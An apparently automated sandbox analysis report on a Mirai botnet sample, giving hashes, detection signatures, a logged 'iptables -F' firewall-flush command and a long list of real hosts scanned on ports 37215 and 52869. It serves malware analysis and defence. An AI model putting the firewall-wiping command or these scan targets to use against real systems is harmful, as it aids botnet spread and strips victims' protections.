Linux Analysis Report x86

Overview

General Information

Sample Name: x86
Analysis ID: 519694
MD5: 776097f22f49b5f4c467e2afdee63009
SHA1: 540cb7d95922f31459afb94d6b37827b41bf677e
SHA256: c817429ed299ec43b67bf47aad81081496d8ab45afe231890bdb564f4bf4db7d
Tags: Mirai

Detection

Mirai
Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill many processes (SIGKILL)
Deletes all firewall rules
Connects to many ports of the same IP (likely port scanning)
Sample deletes itself
Sample is packed with UPX
Uses known network protocols on non-standard ports
Deletes security-related log files
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Executes the "iptables" command used for managing IP filtering and manipulation
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: x86 Virustotal: Detection: 35%
Source: x86 ReversingLabs: Detection: 34%

Bitcoin Miner:

Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5278) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5284) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5286) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 5410) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5456) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pkill (PID: 5571) Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Deletes all firewall rules
Source: /bin/sh (PID: 5272) Args: iptables -F
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 197.253.96.115 ports 2,5,6,8,9,52869
Uses known network protocols on non-standard ports
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.204.114.88:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.142.201.92:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.153.113.9:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.24.4.176:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.223.129.169:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.161.237.217:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.203.157.142:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.249.43.225:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.85.5.232:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.90.120.167:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.228.188.42:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.200.249.5:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.91.185.114:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.153.64.50:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.32.95.52:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.93.15.186:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.224.7.237:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.82.168.154:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.31.107.159:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.38.152.208:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.42.53.29:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.105.228.209:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.240.94.165:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.7.26.224:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.97.119.177:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.148.109.85:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.205.127.3:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.187.199.232:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.235.215.248:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.152.115.155:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.179.27.253:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.36.74.0:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.173.91.39:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.140.208.152:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.171.43.53:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.124.71.109:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.173.65.194:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.8.5.156:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.175.199.59:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.187.204.55:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.74.101.5:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.172.191.78:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.237.67.208:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.79.248.6:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.176.222.37:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.1.174.228:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.133.6.132:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.148.249.18:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.255.189.207:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.173.243.207:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.98.147.16:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.86.35.174:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.126.151.8:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.154.166.139:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.8.175.64:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.105.132.130:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.155.40.75:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.85.120.131:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.188.21.130:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.208.149.30:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.208.92.50:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.176.254.136:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.41.99.187:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.182.254.12:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.117.99.103:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.193.250.43:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.185.233.234:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.95.221.33:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.225.154.220:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.133.24.185:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.163.214.144:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.35.177.117:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.52.133.129:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 156.93.42.222:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.127.18.177:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.62.74.160:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.206.176.107:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 41.171.118.121:37215
Source: global traffic TCP traffic: 192.168.2.23:48500 -> 197.86.102.27:37215
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.140.235.75:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.72.238.75:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.215.81.18:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.217.106.75:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.138.149.14:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.149.248.129:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.180.85.130:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.215.36.125:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.120.132.36:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.59.53.53:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.181.247.141:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.249.176.74:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.109.105.114:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.46.244.2:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.253.123.91:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.33.192.36:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.166.55.160:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.207.59.27:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.9.173.9:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.130.57.110:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.247.10.119:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.57.10.220:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.67.178.34:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.225.28.50:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.107.194.89:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.102.129.137:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.43.98.140:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.188.252.244:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.128.10.94:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.144.102.228:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.145.126.155:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.142.252.146:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.94.13.23:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.207.180.161:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.33.30.34:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.53.193.157:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.21.172.188:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.38.124.230:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.5.247.66:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.122.13.123:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.231.31.99:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.143.109.18:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.201.68.174:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.81.149.42:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.22.84.23:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.0.35.217:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.62.52.107:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.126.252.211:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.156.8.176:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.203.155.214:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.189.84.153:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.20.216.222:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.87.231.108:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.139.182.65:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.85.37.101:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.238.117.60:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.96.35.60:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.4.62.230:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.101.218.41:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.68.164.109:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.160.79.1:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.24.1.227:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.214.4.96:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.145.110.224:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.105.184.211:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.137.143.70:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.23.128.64:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.30.52.93:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.10.44.21:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.9.87.179:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.212.254.17:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.42.170.55:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.43.41.104:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.64.11.32:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.113.99.200:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.129.78.246:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.119.138.71:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.202.177.110:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.186.220.244:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.164.77.3:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.0.220.251:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.207.196.164:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.32.42.8:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.185.214.51:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.27.83.54:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.204.20.65:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.0.202.134:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.13.159.214:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.5.110.155:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.59.30.11:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.216.48.240:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.91.68.219:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.155.166.172:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.2.16.38:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.80.218.173:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.181.171.194:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.247.30.207:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.117.59.75:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.230.98.236:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.33.38.148:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.181.102.165:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.32.215.50:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.94.69.166:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.252.133.139:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.192.141.120:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.208.238.173:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.41.234.9:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.148.244.203:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.248.76.232:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.26.84.32:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.69.32.247:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.102.198.254:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.200.186.68:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.18.255.200:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.3.172.250:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.8.6.201:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.147.109.23:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.4.91.226:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.65.0.51:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.118.215.57:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.229.109.40:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.147.166.12:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.254.119.245:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.221.253.126:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.158.24.53:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.77.249.17:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.125.229.49:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.107.89.159:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.125.142.188:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.3.20.88:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.189.110.98:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.105.3.237:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.154.63.226:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.172.166.123:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.107.152.91:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.193.160.102:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.54.125.230:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.97.133.51:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.29.67.239:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.203.192.163:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.147.234.140:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.96.105.209:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.4.205.221:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.204.11.233:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.157.176.143:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.223.121.53:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.211.7.177:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.193.93.44:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.57.197.226:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.214.42.21:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.192.185.51:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.39.184.82:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.253.96.115:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.216.125.177:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.202.38.39:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 41.77.68.155:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.146.50.70:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 156.96.61.239:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.160.182.90:52869
Source: global traffic TCP traffic: 192.168.2.23:48244 -> 197.163.70.11:52869
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.7.22.45:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.72.241.59:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.215.199.44:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.122.145.226:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.43.39.252:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.68.210.189:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.224.205.247:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.102.67.143:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.160.233.75:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.1.30.26:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.246.98.208:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.199.90.78:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.141.52.111:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.79.177.207:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.173.150.164:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.190.240.66:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.89.165.83:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.74.248.4:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.59.62.84:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.174.68.192:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.236.159.36:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.171.239.113:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.223.154.4:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.131.140.160:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.99.236.75:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.78.20.251:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.211.172.103:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.163.237.229:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.29.183.94:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.185.174.218:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.171.178.228:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.203.79.177:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.144.69.209:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.20.140.196:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.38.204.247:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.207.236.14:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.156.213.190:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.252.25.116:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.145.188.176:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.167.156.17:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.101.193.190:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.148.220.113:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.203.79.109:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.208.155.233:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.215.211.168:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.210.197.236:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.165.53.174:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.236.25.62:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.33.209.237:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.5.71.92:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.142.158.50:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.174.243.185:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.60.13.124:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.33.209.230:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.148.17.148:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.69.187.74:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.230.41.115:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.107.43.182:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.90.69.11:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.211.128.186:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.100.245.11:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.147.86.15:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.87.227.20:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.250.10.24:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.100.219.74:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.179.142.163:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.34.79.123:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.196.237.32:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.55.66.11:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.181.116.65:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.89.174.36:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.163.100.177:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.90.209.41:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.55.224.44:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.71.164.148:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.152.248.118:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.229.61.255:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.218.69.15:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.12.88.62:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.166.21.61:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.36.59.112:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.53.210.115:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.113.11.199:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.44.50.63:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.206.68.107:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.219.141.11:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.108.207.246:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.98.164.103:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.219.247.204:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.100.193.92:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.103.197.53:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.42.232.38:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.161.89.202:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.100.0.31:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.73.77.116:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.42.56.45:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 197.166.234.90:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.43.49.127:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 156.108.208.255:37215
Source: global traffic TCP traffic: 192.168.2.23:16756 -> 41.227.131.34:37215
